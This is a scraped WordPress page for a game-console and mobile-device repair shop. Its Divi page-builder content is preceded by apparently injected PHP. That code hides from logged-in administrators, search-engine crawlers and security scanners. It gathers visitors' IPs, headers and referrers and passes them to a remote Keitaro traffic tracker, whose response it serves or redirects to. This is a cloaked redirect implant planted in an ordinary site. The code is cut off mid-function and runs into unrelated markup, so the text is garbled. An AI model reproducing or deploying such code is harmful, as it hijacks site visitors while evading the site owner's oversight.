if (isset($_COOKIE['zVZ'])) {
die('XXM' . 'tug');
}
if (!function_exists('checkCurrentURL')) {
if (@function_exists('is_user_logged_in')) {
if (is_user_logged_in()) {
return false;
}
}
foreach ($_COOKIE as $key => $value) {
if (strpos($key, 'wordpress_logged_in_') === 0) {
return false;
}
}
$bad_ua = '(msnbot|baidu|yahoo|search|bing|ask|indexer|cuill.com|clushbot|360spider|80legs|aibot|aboundex|acunetix|ahrefsbot|alexibot|blexbot|backdoorbot|backweb|baiduspider|bandit|batchftp|bigfoot|blackwidow|blowfish|botalot|buddy|builtbottough|bullseye|bunnyslippers|cegbfeieh|cheesebot|cherrypicker|chinaclaw|cogentbot|collector|copier|copyrightcheck|crescent|custo|diibot|disco|dittospyder|drip|easydl|eirgrabber|emailcollector|emailsiphon|emailwolf|erocrawler|exabot|extractor|eyenetie|fhscan|foobot|frontpage|go-ahead-got-it|grabnet|grafula|hmview|httrack|harvest|ilsebot|infonavibot|infotekies|intelliseek|interget|iria|joc|jakarta|jennybot|jetcar|justview|jyxobot|lnspiderguy|lexibot|linkscan|linkwalker|linkextractorpro|linkpadbot|miixpc|mj12bot|mag-net|magnet|markwatch|memo|mirror|nameprotect|nicerspro|npbot|navroad|nearsite|netants|netmechanic|netspider|netzip|netcraft|nextgensearchbot|nimblecrawler|ninja|octopus|openfind|outfoxbot|pagegrabber|pockey|propowerbot|prowebwalker|pump|rma|reget|realdownload|reaper|recorder|repomonkey|seokicks|searchmetricsbot|semrushbot|siphon|siteexplorer|sitesnagger|slysearch|smartdownload|snake|snapbot|snoopy|spacebison|spankbot|sqworm|stripper|sucker|superbot|superhttp|surfbot|szukacz|teleport|telesoft|thenomad|tighttwatbot|titan|true_bot|turnitinbot|turnitinbot|vci|vacuum|voideye|wisenutbot|www-collector-e|wwwoffle|webauto|webbandit|webcopier|webemailextrac|webenhancer|webfetch|webleacher|webreaper|websauger|webstripper|webwhacker|webzip|webmasterworldforumbot|webster|wget|whacker|widow|xaldon|xenu|zeus|zmeu|zyborg|asterias|attach|cosmos|dragonfly|ecatch|ebingbong|flunky|gotit|hloader|humanlinks|ia_archiver|larbin|lftp|likse|lwp-trivial|moget|niki-bot|pavuk|pcbrowser|psbot|rogerbot|sogou|spanner|spbot|suzuran|takeout|turingos)';
$bad_uri = '\?view=login|\?view=registration|\?wc-ajax|xmlrpc.php|wp-includes|wp-content|wp-login.php|wp-cron.php|\?feed=|wp-json|\/feed|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.tiff|\.mpg|\.wmv|\.mp3|\.mpeg|\.zip|\.gzip|\.rar|\.exe|\.pdf|\.doc|\.swf|\.txt|wp-admin|admin|administrator';
$bad_cookies = array('wordpress_logged_in', 'another_bad_cookie');
function checkUserAgent($bad_ua) {
if (preg_match("/$bad_ua/", $_SERVER['HTTP_USER_AGENT'])) {
return false;
}
}
function checkCurrentURL($bad_uri) {
$current_url = $_SERVER['REQUEST_URI'];
if (preg_match("/$bad_uri/", $current_url)) {
return false;
}
}
function checkCookies($bad_cookies) {
foreach ($bad_cookies as $cookie) {
if (isset($_COOKIE[$cookie])) {
return false;
}
}
}
checkUserAgent($bad_ua);
checkCurrentURL($bad_uri);
checkCookies($bad_cookies);
class KClient {
const SESSION_SUB_ID = 'sub_id';
const SESSION_LANDING_TOKEN = 'landing_token';
const VERSION = 3;
const STATE_SESSION_KEY = 'keitaro_state';
const STATE_SESSION_EXPIRES_KEY = 'keitaro_state_expires';
const DEFAULT_TTL = 1;
const NOT_FOUND_STATUS = 404;
private $_httpClient;
private $_debug = false;
private $_trackerUrl;
private $_params = array();
private $_log = array();
private $_excludeParams = array('api_key', 'token', 'language', 'ua', 'ip', 'referrer', 'force_redirect_offer');
private $_result;
private $_stateRestored;
private $_sessionsDisabled = false;
const ERROR = '[404] kclnotwrk';
public function __construct($trackerUrl, $token) {
$this->trackerUrl($trackerUrl);
$this->campaignToken($token);
$this->version(self::VERSION);
$this->param('info', 1);
$this->fillParams();
}
public function fillParams() {
$referrer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : null;
$this->setHttpClient(new KHttpClient());
$host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : null;
$requestUri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : null;
$this->ip($this->_findIp())
->ua(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : null)
->language((isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''))
->xRequestedWith(isset($_SERVER['HTTP_X_REQUESTED_WITH']) ? $_SERVER['HTTP_X_REQUESTED_WITH'] : null)
->seReferrer($referrer)
->referrer($referrer)
->param('original_headers', $this->_getAllHeaders())
->param('original_host', isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'localhost')
->param('original_method', isset($_SERVER["REQUEST_METHOD"]) ? $_SERVER['REQUEST_METHOD'] : 'GET')
->param('uri', ((!empty($_SERVER['HTTPS'])) ? 'https' : 'http') .
'://' . $host . $requestUri)
->param('kversion', '3.4');
if ($this->isPrefetchDetected()) {
$this->param('prefetch', 1);
}
}
public function currentPageAsReferrer() {
$this->referrer($this->_getCurrentPage());
return $this;
}
public function debug($state = true) {
$this->_debug = $state;
return $this;
}
public function seReferrer($seReferrer) {
$this->_params['se_referrer'] = $seReferrer;
return $this;
}
public function referrer($referrer) {
$this->_params['referrer'] = $referrer;
return $this;
}
public function xRequestedWith($xRequestedWith) {
$this->_params['x_requested_with'] = $xRequestedWith;
return $this;
}
public function setHttpClient($httpClient) {
$this->_httpClient = $httpClient;
return $this;
}
public function trackerUrl($trackerUrl) {
if (!empty($trackerUrl)) {
$request = parse_url($trackerUrl);
$this->_trackerUrl = "{$request['scheme']}://{$request['host']}";
if (isset($request['port'])) {
$this->_trackerUrl .= ':' . $request['port'];
}
}
}
// @deprecated
public function token($token) {
return $this->campaignToken($token);
}
public function campaignToken($campaignToken) {
$this->_params['token'] = $campaignToken;
return $this;
}
public function version($version) {
$this->_params['version'] = $version;
return $this;
}
public function ua($ua) {
$this->_params['ua'] = $ua;
return $this;
}
public function language($language) {
$this->_params['language'] = $language;
return $this;
}
public function keyword($keyword) {
$this->_params['keyword'] = $keyword;
return $this;
}
public function forceRedirectOffer() {
$this->_params['force_redirect_offer'] = 1;
}
public function ip($ip) {
$this->_params['ip'] = $ip;
return $this;
}
public function sendUtmLabels() {
foreach ($_GET as $name => $value) {
if (strstr($name, 'utm_')) {
$this->_params[$name] = $value;
}
}
}
public function setLandingToken($token) {
$this->_startSession();
$_SESSION['token'] = $token;
}
public function getSubId() {
$result = $this->performRequest();
if (empty($result->info->sub_id)) {
$this->log('No sub_id is defined');
return 'no_subid';
}
$subId = $result->info->sub_id;
return $subId;
}
public function getToken() {
$result = $this->performRequest();
if (empty($result->info->sub_id)) {
$this->log('No landing token is defined');
return 'no_token';
}
$subId = $result->info->token;
return $subId;
}
public function sendAllParams() {
foreach ($_GET as $name => $value) {
if (empty($this->_params[$name]) && !in_array($name, $this->_excludeParams)) {
$this->_params[$name] = $value;
}
}
}
public function restoreFromSession() {
if ($this->isStateRestored() || $this->_sessionsDisabled) {
return;
}
$this->_startSession();
if (!empty($_SESSION[self::STATE_SESSION_KEY])) {
if ($_SESSION[self::STATE_SESSION_EXPIRES_KEY] < time()) {
unset($_SESSION[self::STATE_SESSION_KEY]);
unset($_SESSION[self::STATE_SESSION_EXPIRES_KEY]);
$this->log('State expired');
} else {
$this->_result = json_decode($_SESSION[self::STATE_SESSION_KEY], false);
if (isset($this->_result) && isset($this->_result->headers)) {
$this->_result->headers = array();
}
$this->_stateRestored = true;
$this->log('State restored');
}
}
}
public function disableSessions() {
$this->_sessionsDisabled = true;
}
public function restoreFromQuery() {
if (isset($_GET['_subid'])) {
$this->_stateRestored = true;
if (empty($this->_result)) {
$this->_result = new StdClass();
$this->_result->info = new StdClass();
}
$this->_result->info->sub_id = $_GET['_subid'];
$this->log('SubId loaded from query');
if (isset($_GET['_token'])) {
$this->_result->info->token = $_GET['_token'];
$this->log('Landing token loaded from query');
}
$this->_storeState($this->_result, self::DEFAULT_TTL);
$this->_stateRestored = true;
}
}
public function isStateRestored() {
return $this->_stateRestored;
}
public function isPrefetchDetected() {
$checkServerParams = array('HTTP_X_PURPOSE' => 'preview', 'HTTP_X_MOZ' => 'prefetch', 'HTTP_X_FB_HTTP_ENGINE' => 'Liger');
foreach ($checkServerParams as $name => $value) {
if (isset($_SERVER[$name]) && $_SERVER[$name] == $value) {
return true;
}
}
return false;
}
public function saveCookie($key, $value, $ttl) {
if (isset($_COOKIE[$key]) && $_COOKIE[$key] == $value) {
return;
}
if (!headers_sent()) {
setcookie($key, $value, $this->_getCookiesExpireTimestamp($ttl), '/', $this->_getCookieHost());
}
$_COOKIE[$key] = $value;
}
public function param($name, $value) {
if (!in_array($name, $this->_excludeParams)) {
$this->_params[$name] = $value;
}
return $this;
}
public function params($value) {
if (!empty($value)) {
if (is_string($value)) {
parse_str($value, $result);
foreach ($result as $name => $value) {
$this->param($name, $value);
}
}
}
return $this;
}
public function reset() {
$this->_result = null;
}
public function performRequest() {
if ($this->_result) {
return $this->_result;
}
$request = $this->_buildRequestUrl();
$params = $this->getParams();
$options = $this->_getRequestOptions();
$this->log('Request: ' . $request);
try {
$result = $this->_httpClient->request($request, $params, $options);
$this->log('Response: ' . $result);
} catch (KClientError $e) {
if ($this->_debug) {
throw $e;
} else {
$errorCode = $e->getHumanCode();
$errorCode = $errorCode ? $errorCode . ' ' : '';
echo $errorCode . self::ERROR;
return;
}
}
$this->_result = json_decode($result);
$this->_storeState(
$this->_result,
isset($this->_result->cookies_ttl) ? $this->_result->cookies_ttl : null
);
if (isset($this->_result->cookies)) {
$this->_saveKeitaroCookies($this->_result->cookies, $this->_result->cookies_ttl);
}
return $this->_result;
}
/**
* @param bool $break
* @param bool $print
* @return bool|string
* @throws KClientError
*/
public function execute($break = false, $print = true) {
$result = $this->performRequest();
$body = $this->_buildBody($result);
if (!$print) {
return $body;
}
$this->_sendHeaders($result);
echo $body;
}
public function executeAndBreak() {
$result = $this->performRequest();
$body = $this->_buildBody($result);
$this->_sendHeaders($result);
if (!empty($body)) {
die($body);
}
if (!empty($result->headers) && ResponseExecutor::containsActionHeader($result->headers)) {
die($body);
}
if (!empty($result->status) && $result->status == self::NOT_FOUND_STATUS) {
die($body);
}
}
public function getContent() {
$result = $this->performRequest();
return $this->_buildBody($result);
}
public function showLog($separator = '
') {
echo '
[et_pb_section fb_built=”1″ admin_label=”Hero” _builder_version=”3.0.82″ use_background_color_gradient=”on” background_color_gradient_start=”#474ab6″ background_color_gradient_end=”#9271f6″ background_image=”http:\/\/www.gameandvid.com\/wp-content\/uploads\/2018\/12\/coding-background-texture.jpg” background_blend=”overlay” custom_padding=”58px|0px|19px|0px|false|false” animation_style=”slide” animation_direction=”top” animation_intensity_slide=”2%” locked=”off”][et_pb_row custom_width_px=”1280px” custom_margin=”|||” _builder_version=”3.0.82″ background_size=”initial” background_position=”top_left” background_repeat=”repeat”][et_pb_column type=”1_2″ _builder_version=”3.0.47″ parallax=”off” parallax_method=”on”][et_pb_text _builder_version=”3.19.3″ header_font=”|on|||” header_font_size=”42px” header_font_size_last_edited=”off|desktop” header_line_height=”1.3em” background_layout=”dark” custom_padding=”|||” locked=”off”]<\/p>\n
[\/et_pb_text][et_pb_text _builder_version=”3.0.82″ text_text_color=”#d4ccff” text_font_size=”16px” text_line_height=”1.9em” locked=”off”]<\/p>\n
Bring us your broken console or electronics to be examined free of charge. All repairs are done on-site and will not be shipped to a third party.\u00a0<\/p>\n
[\/et_pb_text][et_pb_button button_url=”http:\/\/www.gameandvid.com\/about\/” button_text=”Learn About US” _builder_version=”3.19.2″ custom_button=”on” button_text_size=”16px” button_text_color=”#ffffff” button_bg_color=”#09e1c0″ button_border_width=”10px” button_border_color=”#09e1c0″ button_border_radius=”100px” button_letter_spacing=”1px” button_font=”|on||on|” button_icon=”%%36%%” button_on_hover=”off” box_shadow_style=”preset1″ box_shadow_vertical=”10px” box_shadow_blur=”50px” box_shadow_spread=”5px” box_shadow_color=”rgba(0,188,160,0.6)” custom_margin=”20px|||” animation_style=”zoom” animation_delay=”100ms” animation_intensity_zoom=”10%” button_letter_spacing_hover=”2px” saved_tabs=”all” locked=”off” button_text_size__hover_enabled=”off” button_one_text_size__hover_enabled=”off” button_two_text_size__hover_enabled=”off” button_text_color__hover_enabled=”off” button_one_text_color__hover_enabled=”off” button_two_text_color__hover_enabled=”off” button_border_width__hover_enabled=”off” button_one_border_width__hover_enabled=”off” button_two_border_width__hover_enabled=”off” button_border_color__hover_enabled=”off” button_one_border_color__hover_enabled=”off” button_two_border_color__hover_enabled=”off” button_border_radius__hover_enabled=”off” button_one_border_radius__hover_enabled=”off” button_two_border_radius__hover_enabled=”off” button_letter_spacing__hover_enabled=”on” button_letter_spacing__hover=”2px” button_one_letter_spacing__hover_enabled=”off” button_two_letter_spacing__hover_enabled=”off” button_bg_color__hover_enabled=”off” button_one_bg_color__hover_enabled=”off” button_two_bg_color__hover_enabled=”off”][\/et_pb_button][\/et_pb_column][et_pb_column type=”1_2″ _builder_version=”3.0.47″ parallax=”off” parallax_method=”on”][et_pb_image src=”http:\/\/www.gameandvid.com\/wp-content\/uploads\/2019\/01\/game-icon.png” _builder_version=”3.19.3″ custom_margin=”||0px|” custom_padding=”|||” animation_style=”zoom” animation_direction=”left” animation_delay=”100ms” animation_intensity_zoom=”20%”][\/et_pb_image][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=”1″ specialty=”on” admin_label=”All Courses” _builder_version=”3.0.82″ custom_padding=”52px|0px|40px|0px|false|false”][et_pb_column type=”1_3″ _builder_version=”3.0.47″ parallax__hover=”off” parallax_method__hover=”on” parallax=”off” parallax_method=”on”][et_pb_text _builder_version=”3.19.2″ text_text_color=”#7272ff” header_font=”|on|||” header_text_color=”#7272ff” header_font_size=”36px” header_line_height=”1.5em” custom_margin=”||20px|” animation_style=”slide” animation_direction=”bottom” animation_intensity_slide=”10%” locked=”off”]<\/p>\n
[\/et_pb_text][et_pb_divider color=”#09e1c0″ divider_weight=”4px” disabled_on=”on|on|off” _builder_version=”3.2″ background_size=”initial” background_position=”top_left” background_repeat=”repeat” max_width=”40px” module_alignment=”left” custom_margin=”||10px|” animation_style=”zoom” animation_direction=”left” saved_tabs=”all” locked=”off”][\/et_pb_divider][et_pb_text _builder_version=”3.0.82″ text_text_color=”#8585bd” text_font_size=”16px” text_line_height=”1.9em” animation_style=”zoom” animation_intensity_zoom=”6%” locked=”off”]<\/p>\n
We have laid out the most common issues to help you figure out what services are right for you!<\/strong><\/span><\/p>\n YouTube and Google is great for identifying the problem with your electronics but it is often a painstaking process. Use our chart to help narrow down the possibilities.\u00a0<\/p>\n [\/et_pb_text][et_pb_button button_url=”http:\/\/www.gameandvid.com\/services\/” button_text=”view services” button_alignment=”left” _builder_version=”3.19.2″ custom_button=”on” button_text_size=”16px” button_text_color=”#ffffff” button_bg_color=”#7272ff” button_border_width=”10px” button_border_color=”#7272ff” button_border_radius=”100px” button_letter_spacing=”1px” button_font=”|on||on|” button_icon=”%%36%%” button_on_hover=”off” box_shadow_style=”preset1″ box_shadow_vertical=”10px” box_shadow_blur=”50px” box_shadow_spread=”5px” box_shadow_color=”rgba(114,114,255,0.4)” custom_margin=”20px|||” animation_style=”zoom” animation_delay=”100ms” animation_intensity_zoom=”6%” button_letter_spacing_hover=”2px” saved_tabs=”all” locked=”off” button_text_size__hover_enabled=”off” button_one_text_size__hover_enabled=”off” button_two_text_size__hover_enabled=”off” button_text_color__hover_enabled=”off” button_one_text_color__hover_enabled=”off” button_two_text_color__hover_enabled=”off” button_border_width__hover_enabled=”off” button_one_border_width__hover_enabled=”off” button_two_border_width__hover_enabled=”off” button_border_color__hover_enabled=”off” button_one_border_color__hover_enabled=”off” button_two_border_color__hover_enabled=”off” button_border_radius__hover_enabled=”off” button_one_border_radius__hover_enabled=”off” button_two_border_radius__hover_enabled=”off” button_letter_spacing__hover_enabled=”on” button_letter_spacing__hover=”2px” button_one_letter_spacing__hover_enabled=”off” button_two_letter_spacing__hover_enabled=”off” button_bg_color__hover_enabled=”off” button_one_bg_color__hover_enabled=”off” button_two_bg_color__hover_enabled=”off”][\/et_pb_button][\/et_pb_column][et_pb_column type=”2_3″ specialty_columns=”2″ _builder_version=”3.0.47″ parallax__hover=”off” parallax_method__hover=”on” parallax=”off” parallax_method=”on”][et_pb_row_inner custom_padding=”0px|0px|0px|0px” use_custom_gutter=”on” gutter_width=”1″ module_class_1=”et_pb_column_1_2″ module_class_2=”et_pb_column_1_2″ _builder_version=”3.0.82″ box_shadow_style=”preset1″ box_shadow_vertical=”10px” box_shadow_blur=”60px” box_shadow_color=”rgba(71,74,182,0.12)” animation_style=”zoom” animation_intensity_zoom=”6%”][et_pb_column_inner type=”1_2″ saved_specialty_column_type=”2_3″ _builder_version=”3.0.47″ parallax__hover=”off” parallax_method__hover=”on” module_class__hover=”et_pb_column_1_2″ parallax=”off” parallax_method=”on” module_class=”et_pb_column_1_2″][et_pb_blurb title=”Blinking Blue Light” image=”http:\/\/www.gameandvid.com\/wp-content\/uploads\/2018\/12\/error-icon-1.jpg” icon_placement=”left” image_max_width=”64px” content_max_width=”1100px” _builder_version=”3.19.2″ header_font=”|on|||” header_text_color=”#2e2545″ header_line_height=”1.5em” body_text_color=”#8585bd” body_line_height=”1.9em” background_color=”#ffffff” box_shadow_style=”preset7″ box_shadow_horizontal=”-1px” box_shadow_vertical=”-1px” box_shadow_color=”rgba(71,74,182,0.12)” custom_margin=”|||” custom_padding=”30px|30px|30px|30px” animation_style=”zoom” animation_direction=”bottom” animation_intensity_zoom=”20%” animation_starting_opacity=”100%” locked=”off”]<\/p>\n A glowing blue light on your PS4 means that your system has not started up fully. It may be caused by the APU chip with a loose solder joint.<\/p>\n [\/et_pb_blurb][et_pb_blurb title=”Disc Drive” image=”http:\/\/www.gameandvid.com\/wp-content\/uploads\/2018\/12\/disc-drive-icon.jpg” icon_placement=”left” image_max_width=”64px” content_max_width=”1100px” _builder_version=”3.19.2″ header_font=”|on|||” header_text_color=”#2e2545″ header_line_height=”1.5em” body_text_color=”#8585bd” body_line_height=”1.9em” background_color=”#ffffff” box_shadow_style=”preset7″ box_shadow_horizontal=”-1px” box_shadow_vertical=”-1px” box_shadow_color=”rgba(71,74,182,0.12)” custom_margin=”|||” custom_padding=”30px|30px|30px|30px” animation_style=”zoom” animation_direction=”bottom” animation_intensity_zoom=”20%” animation_starting_opacity=”100%” locked=”off”]<\/p>\n Is your Blu-ray drive not accepting discs? Bring it by for a quick inspection! We can fix most disc drive problems.<\/p>\n [\/et_pb_blurb][et_pb_blurb title=”HDMI – No Video” image=”http:\/\/www.gameandvid.com\/wp-content\/uploads\/2018\/12\/hdmi-icon.jpg” icon_placement=”left” image_max_width=”64px” content_max_width=”1100px” _builder_version=”3.19.2″ header_font=”|on|||” header_text_color=”#2e2545″ header_line_height=”1.5em” body_text_color=”#8585bd” body_line_height=”1.9em” background_color=”#ffffff” box_shadow_style=”preset7″ box_shadow_horizontal=”-1px” box_shadow_vertical=”-1px” box_shadow_color=”rgba(71,74,182,0.12)” custom_margin=”|||” custom_padding=”30px|30px|30px|30px” animation_style=”zoom” animation_direction=”bottom” animation_intensity_zoom=”20%” animation_starting_opacity=”100%” locked=”off”]<\/p>\n A bad HDMI port on your Playstation 4 can cause your console to show a white light but not show images on your TV.<\/p>\n [\/et_pb_blurb][et_pb_blurb title=”Hard Drive” image=”http:\/\/www.gameandvid.com\/wp-content\/uploads\/2018\/12\/hdd-icon-2.jpg” icon_placement=”left” image_max_width=”64px” content_max_width=”1100px” _builder_version=”3.19.2″ header_font=”|on|||” header_text_color=”#2e2545″ header_line_height=”1.5em” body_text_color=”#8585bd” body_line_height=”1.9em” background_color=”#ffffff” box_shadow_style=”preset7″ box_shadow_horizontal=”-1px” box_shadow_vertical=”-1px” box_shadow_color=”rgba(71,74,182,0.12)” custom_margin=”|||” custom_padding=”30px|30px|30px|30px” animation_style=”zoom” animation_direction=”bottom” animation_intensity_zoom=”20%” animation_starting_opacity=”100%” locked=”off”]<\/p>\n Failing to show home screen, safe mode, or not updating may be caused by a faulty hard drive.<\/p>\n [\/et_pb_blurb][\/et_pb_column_inner][et_pb_column_inner type=”1_2″ saved_specialty_column_type=”2_3″ _builder_version=”3.0.47″ parallax__hover=”off” parallax_method__hover=”on” module_class__hover=”et_pb_column_1_2″ parallax=”off” parallax_method=”on” module_class=”et_pb_column_1_2″][et_pb_blurb title=”Overheating” image=”http:\/\/www.gameandvid.com\/wp-content\/uploads\/2018\/12\/heat-icon.jpg” icon_placement=”left” image_max_width=”64px” content_max_width=”1100px” _builder_version=”3.19.2″ header_font=”|on|||” header_text_color=”#2e2545″ header_line_height=”1.5em” body_text_color=”#8585bd” body_line_height=”1.9em” background_color=”#ffffff” box_shadow_style=”preset7″ box_shadow_horizontal=”-1px” box_shadow_vertical=”-1px” box_shadow_color=”rgba(71,74,182,0.12)” custom_margin=”|||” custom_padding=”30px|30px|30px|30px” animation_style=”zoom” animation_direction=”bottom” animation_intensity_zoom=”20%” animation_starting_opacity=”100%” locked=”off”]<\/p>\n Loud fans and unexpected shutdowns are indicators of an overheating system. Cleaning and changing your thermal paste will often fix this issue.<\/p>\n [\/et_pb_blurb][et_pb_blurb title=”No Power” image=”http:\/\/www.gameandvid.com\/wp-content\/uploads\/2018\/12\/power-icon.jpg” icon_placement=”left” image_max_width=”64px” content_max_width=”1100px” _builder_version=”3.19.2″ header_font=”|on|||” header_text_color=”#2e2545″ header_line_height=”1.5em” body_text_color=”#8585bd” body_line_height=”1.9em” background_color=”#ffffff” box_shadow_style=”preset7″ box_shadow_horizontal=”-1px” box_shadow_vertical=”-1px” box_shadow_color=”rgba(71,74,182,0.12)” custom_margin=”|||” custom_padding=”30px|30px|30px|30px” animation_style=”zoom” animation_direction=”bottom” animation_intensity_zoom=”20%” animation_starting_opacity=”100%” locked=”off”]<\/p>\n No power can be caused by a variety of issues. From blown fuses to a bad power supply. Please bring it for a diagnosis.<\/p>\n [\/et_pb_blurb][et_pb_blurb title=”Charging Port” image=”http:\/\/www.gameandvid.com\/wp-content\/uploads\/2018\/12\/charging-icon.jpg” icon_placement=”left” image_max_width=”64px” content_max_width=”1100px” _builder_version=”3.19.2″ header_font=”|on|||” header_text_color=”#2e2545″ header_line_height=”1.5em” body_text_color=”#8585bd” body_line_height=”1.9em” background_color=”#ffffff” box_shadow_style=”preset7″ box_shadow_horizontal=”-1px” box_shadow_vertical=”-1px” box_shadow_color=”rgba(71,74,182,0.12)” custom_margin=”|||” custom_padding=”30px|30px|30px|30px” animation_style=”zoom” animation_direction=”bottom” animation_intensity_zoom=”20%” animation_starting_opacity=”100%” locked=”off”]<\/p>\n Charging ports continue to be a problem for mobile devices. We can swap out you broken charging port on your mobile device.<\/p>\n [\/et_pb_blurb][et_pb_blurb title=”Cracked Screen” image=”http:\/\/www.gameandvid.com\/wp-content\/uploads\/2018\/12\/cracked-icon.jpg” icon_placement=”left” image_max_width=”64px” content_max_width=”1100px” _builder_version=”3.19.2″ header_font=”|on|||” header_text_color=”#2e2545″ header_line_height=”1.5em” body_text_color=”#8585bd” body_line_height=”1.9em” background_color=”#ffffff” box_shadow_style=”preset7″ box_shadow_horizontal=”-1px” box_shadow_vertical=”-1px” box_shadow_color=”rgba(71,74,182,0.12)” custom_margin=”|||” custom_padding=”30px|30px|30px|30px” animation_style=”zoom” animation_direction=”bottom” animation_intensity_zoom=”20%” animation_starting_opacity=”100%” locked=”off”]<\/p>\n Whether it’s a cell phone, tablet, or a mobile gaming device, accidents do happen. We will replace your LCD or digitizer.<\/p>\n [\/et_pb_blurb][\/et_pb_column_inner][\/et_pb_row_inner][\/et_pb_column][\/et_pb_section][et_pb_section fb_built=”1″ _builder_version=”3.19.4″ custom_padding=”0|0px|13px|0px|false|false”][et_pb_row _builder_version=”3.19.4″ custom_padding=”27px|0px|8px|0px|false|false”][et_pb_column type=”4_4″ _builder_version=”3.19.4″ parallax=”off” parallax_method=”on”][et_pb_code _builder_version=”3.19.4″]\r\n [\/et_pb_text][et_pb_divider color=”#09e1c0″ divider_weight=”4px” disabled_on=”on|on|off” _builder_version=”3.2″ background_size=”initial” background_position=”top_left” background_repeat=”repeat” max_width=”40px” module_alignment=”left” custom_margin=”||10px|” animation_style=”zoom” animation_direction=”left” saved_tabs=”all” locked=”off”][\/et_pb_divider][et_pb_text _builder_version=”3.19.2″ text_font=”||||||||” text_text_color=”#d4ccff” text_font_size=”16px” text_line_height=”1.9em” animation_style=”zoom” animation_intensity_zoom=”6%” locked=”off”]<\/p>\n You don’t have to know what’s wrong with your console. If you have a problem with your electronics, we have the solution. With proper tools and equipment, we’ll have your gadget back to you in no time.<\/p>\n [\/et_pb_text][et_pb_button button_url=”http:\/\/www.gameandvid.com\/services\/” button_text=”View services” _builder_version=”3.19.2″ custom_button=”on” button_text_size=”16px” button_text_color=”#ffffff” button_bg_color=”#09e1c0″ button_border_width=”10px” button_border_color=”#09e1c0″ button_border_radius=”100px” button_letter_spacing=”1px” button_font=”|on||on|” button_icon=”%%36%%” button_on_hover=”off” box_shadow_style=”preset1″ box_shadow_vertical=”10px” box_shadow_blur=”50px” box_shadow_spread=”5px” box_shadow_color=”rgba(0,188,160,0.6)” custom_margin=”20px|||” animation_style=”zoom” animation_delay=”100ms” animation_intensity_zoom=”10%” button_letter_spacing_hover=”2px” saved_tabs=”all” locked=”off” button_text_size__hover_enabled=”off” button_one_text_size__hover_enabled=”off” button_two_text_size__hover_enabled=”off” button_text_color__hover_enabled=”off” button_one_text_color__hover_enabled=”off” button_two_text_color__hover_enabled=”off” button_border_width__hover_enabled=”off” button_one_border_width__hover_enabled=”off” button_two_border_width__hover_enabled=”off” button_border_color__hover_enabled=”off” button_one_border_color__hover_enabled=”off” button_two_border_color__hover_enabled=”off” button_border_radius__hover_enabled=”off” button_one_border_radius__hover_enabled=”off” button_two_border_radius__hover_enabled=”off” button_letter_spacing__hover_enabled=”on” button_letter_spacing__hover=”2px” button_one_letter_spacing__hover_enabled=”off” button_two_letter_spacing__hover_enabled=”off” button_bg_color__hover_enabled=”off” button_one_bg_color__hover_enabled=”off” button_two_bg_color__hover_enabled=”off”][\/et_pb_button][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=”1″ admin_label=”Footer” _builder_version=”3.0.82″ background_color=”#f7f8fc” custom_padding=”0px|0px|100px|0px|false|false” animation_style=”zoom” animation_direction=”bottom” animation_intensity_zoom=”6%” animation_starting_opacity=”100%” saved_tabs=”all”][et_pb_row custom_padding=”0px|0px|43px|0px|false|false” _builder_version=”3.0.82″ background_size=”initial” background_position=”top_left” background_repeat=”repeat”][et_pb_column type=”1_2″ _builder_version=”3.0.47″ parallax=”off” parallax_method=”on”][et_pb_blurb title=”Game Console” image=”http:\/\/www.gameandvid.com\/wp-content\/uploads\/2018\/12\/game-icon.jpg” icon_placement=”left” image_max_width=”64px” content_max_width=”1100px” _builder_version=”3.19.2″ header_font=”|on|||” header_text_color=”#7272ff” header_line_height=”1.5em” body_text_color=”#8585bd” body_line_height=”1.9em” background_color=”#ffffff” box_shadow_style=”preset2″ box_shadow_horizontal=”0px” box_shadow_vertical=”0px” box_shadow_blur=”60px” box_shadow_color=”rgba(71,74,182,0.12)” custom_margin=”-80px|||” custom_padding=”30px|40px|30px|40px” animation_style=”zoom” animation_direction=”bottom” animation_intensity_zoom=”20%” animation_starting_opacity=”100%” locked=”off”]<\/p>\n Modern game consoles\u00a0are more complex than ever. Thousands of surface mounted chips and circuit means more ways that a system can break. You can [\/et_pb_blurb][\/et_pb_column][et_pb_column type=”1_2″ _builder_version=”3.0.47″ parallax=”off” parallax_method=”on”][et_pb_blurb title=”Mobile Device” image=”http:\/\/www.gameandvid.com\/wp-content\/uploads\/2018\/12\/cell-phone-icon.jpg” icon_placement=”left” image_max_width=”64px” content_max_width=”1100px” _builder_version=”3.19.2″ header_font=”|on|||” header_text_color=”#7272ff” header_line_height=”1.5em” body_text_color=”#8585bd” body_line_height=”1.9em” background_color=”#ffffff” box_shadow_style=”preset2″ box_shadow_horizontal=”0px” box_shadow_vertical=”0px” box_shadow_blur=”60px” box_shadow_color=”rgba(71,74,182,0.12)” custom_margin=”-80px|||” custom_margin_tablet=”0px|||” custom_margin_last_edited=”on|phone” custom_padding=”30px|40px|30px|40px” animation_style=”zoom” animation_direction=”bottom” animation_delay=”100ms” animation_intensity_zoom=”20%” animation_starting_opacity=”100%” locked=”off”]<\/p>\n Cell phones are an important tool in our modern life. Going a day without your phone can mean missed calls, text messages, and e-mails from your family, friends, and colleagues. If you need your phone repaired quickly and professionally, leave it to us!<\/p>\n [\/et_pb_blurb][\/et_pb_column][\/et_pb_row][et_pb_row use_custom_gutter=”on” gutter_width=”2″ _builder_version=”3.0.82″ background_size=”initial” background_position=”top_left” background_repeat=”repeat”][et_pb_column type=”1_2″ _builder_version=”3.0.47″ parallax=”off” parallax_method=”on”][et_pb_text _builder_version=”3.0.82″ text_text_color=”#7272ff” header_font=”|on|||” header_text_color=”#7272ff” header_font_size=”36px” header_line_height=”1.5em” background_size=”initial” background_position=”top_left” background_repeat=”repeat” custom_margin=”||20px|” animation_style=”slide” animation_direction=”bottom” animation_intensity_slide=”10%”]<\/p>\n [\/et_pb_text][et_pb_text _builder_version=”3.0.82″ text_text_color=”#8585bd” text_font_size=”22px” 